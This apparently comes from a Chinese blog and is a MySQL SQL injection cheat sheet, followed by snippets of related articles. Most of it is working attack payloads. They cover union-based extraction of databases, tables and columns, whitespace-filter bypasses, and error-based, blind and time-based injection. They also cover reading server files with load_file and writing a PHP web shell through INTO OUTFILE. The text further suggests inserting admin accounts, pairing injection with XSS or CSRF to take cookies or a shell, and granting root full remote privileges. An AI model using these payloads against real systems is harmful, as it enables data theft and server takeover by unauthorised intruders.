目錄:
0×00 mysql一般注入(select)
0×01 mysql一般注入(insert、update)
0×02 mysql報錯注入
0×03 mysql一般盲注
0×04 mysql時間盲注
0×05 mysql其他注入技巧
0×06 mysql資料庫版本特性
0×07 宣告
正文:0×00 mysql一般注入(select)
1.注釋符 # /* –
2.過濾空格注入 使用/**/或()或+代替空格
%0c = form feed, new page %09 = horizontal tab %0d = carriage return %0a = line feed, new line
3.多條資料顯示 concat() group_concat() concat_ws()
4.相關函式 system_user() 系統使用者名稱 user() 使用者名稱 current_user 當前使用者名稱 session_user()連線資料庫的使用者名稱 database() 資料庫名 version() mysql資料庫版本 load_file() mysql讀取本地檔案的函式 @@datadir 讀取資料庫路徑 @@basedir mysql 安裝路徑 @@version_compile_os 作業系統 windows server 2003
grant all privileges on *.* to 『root』@』%』 identified by 』123456′ with grant option;
5.mysql一般注入語句
猜字段數
order by n/* 檢視mysql基本資訊 and 1=2 union select 1,2,3,concat_ws(char(32,58,32),0x7c,user(),database(),version()),5,6,7/* 查 詢資料庫 and 1=2 union select 1,schema_name,3,4 from information_schema.schemata limit 1,1/* and 1=2 union select 1,group_concat(schema_name),3,4 from information_schema.schemata/* 查詢表名 and 1=2 union select 1,2,3,4,table_name,5 from information_schema.tables where table_schema=資料庫的16進製制編碼 limit 1,1/* and 1=2 union select 1,2,3,4,group_concat(table_name),5 from information_schema.tables where table_schema=資料庫的16進製制編碼/* 查詢字段 and 1=2 union select 1,2,3,4,column_name,5,6,7 from information_schema.columns where table_name=表名的十六進製制編碼 and table_schema=資料庫的16進製制編碼 limit 1,1/* and 1=2 union select 1,2,3,4,group_concat(column_name),5,6,7 from information_schema.columns where table_name=表名的十六進製制編碼 and table_schema=資料庫的16進製制編碼/* 查詢資料 and 1=2 union select 1,2,3,欄位1,5,欄位2,7,8 from 資料庫.表/*
判斷是否具有讀寫許可權 and (select count(*) from mysql.user)>0/* and (select count(file_priv) from mysql.user)>0/*
6.mysql讀取寫入檔案
必備條件:
讀:file許可權必備
寫:1.絕對路徑 2.union使用 3. 可以使用」
————————-讀———————-
mysql3.x讀取方法 create table a(cmd text); load data infile 『c:\\***\\***\\***.txt』 into table a; select * from a;
mysql4.x讀取方法 除上述方法還可以使用load_file() create table a(cmd text); insert into a(cmd) values(load_file(『c:\\ddd\\ddd\\ddd.txt』)); select * from a;
mysql5.x讀取方法 上述兩種都可以
讀取檔案技巧: load_file(char(32,26,56,66)) load_file(0x633a5c626f6f742e696e69)
————寫————————–
into outfile寫檔案
union select 1,2,3,char(這裡寫入你轉換成10進製或16進製制的一句話木馬**),5,6,7,8,9,10,7 into outfile 『d:\web\90team.php』/* union select 1,2,3,load_file(『d:\web\logo123.jpg』),5,6,7,8,9,10,7 into outfile 『d:\web\90team.php』/*
0×01 mysql一般注入(insert、update)
mysql一般請求mysql_query不支援多語句執行,mysqli可以。
insert注入多使用報錯注入!
1.如果可以直接插入管理員可以直接使用!
insert into user(username,password) values(『***x』,』 ***x』),(『dddd』,』dddd』)/* 『);
2.如果可以插入一些資料,這些資料會在網頁中顯示,我們可以結合xxs和csrf來獲取cookies或getshell
update注入同上
0×02 mysql報錯注入
1. and(select 1 from(select count(*),concat((select (select (語句)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
語句處填入一般一句,如:select distinct concat(0x7e,0×27,schema_name,0×27,0x7e) from information_schema.schemata limit 0,1
2. and+1=(select+*+from+(select+name_const((語句),1),name_const((語句),1))+as+x)–
3.update web_ids set host=』www.****sec.com』 where id =1 and (select 1 from (select count(*),concat(floor(rand(0)*2),(substring((select (語句)),1,62)))a from information_schema.tables group by a)b);
4.insert into web_ids(host) values((select (1) from mysql.user where 1=1 and (select 1 from (select count(*),concat(floor(rand(0)*2),(substring((select (語句)),1,62)))a from information_schema.tables group by a)b)));
0×03 mysql一般盲注
使用ascii
and ascii(substring((select password from users where id=1),1,1))=49
使用正規表示式
and 1=(select 1 from information_schema.tables where table_schema=」blind_sqli」 and table_name regexp 『^[a-n]『 limit 0,1)
0×04 mysql時間盲注
1170 union select if(substring(current,1,1)=char(11),benchmark(5000000,encode(『msg』,』by 5 seconds』)),null) from (select database() as current) as tbl
union select if(substring(password,1,1)=』a』,benchmark(100000,sha1(1)),0) user,password from mysql.user where user = 『root』
0×05 mysql其他注入技巧
以後遇見了更新
0×06 mysql資料庫版本特性
1. mysql5.0以後 information.schema庫出現 2. mysql5.1以後 udf 匯入xx\lib\plugin\ 目錄下 3.mysql5.x以後 system執行命令
mysql 報錯注入寫檔案 mysql注入總結
目錄 0x00 mysql一般注入 select 0x01 mysql一般注入 insert update 0x02 mysql報錯注入 0x03 mysql一般盲注 0x04 mysql時間盲注 0x05 mysql其他注入技巧 0x06 mysql資料庫版本特性 0x07 宣告 正文 0x00 ...
mysql 報錯注入語句 mysql注入
sql的注入型別有以下5種 boolean based blind sql injection 布林型注入 error based sql injection 報錯型注入 union query sql injection 可聯合查詢注入 stacked queries sql injection ...
新型mysql報錯注入
新型mysql報錯注入,這種報錯注入主要是基於mysql中無符號int資料型別的溢位 1.查詢資料庫版本 select 2 if select 8 from select version s 18446744073709551610,18446744073709551610 select 1e308...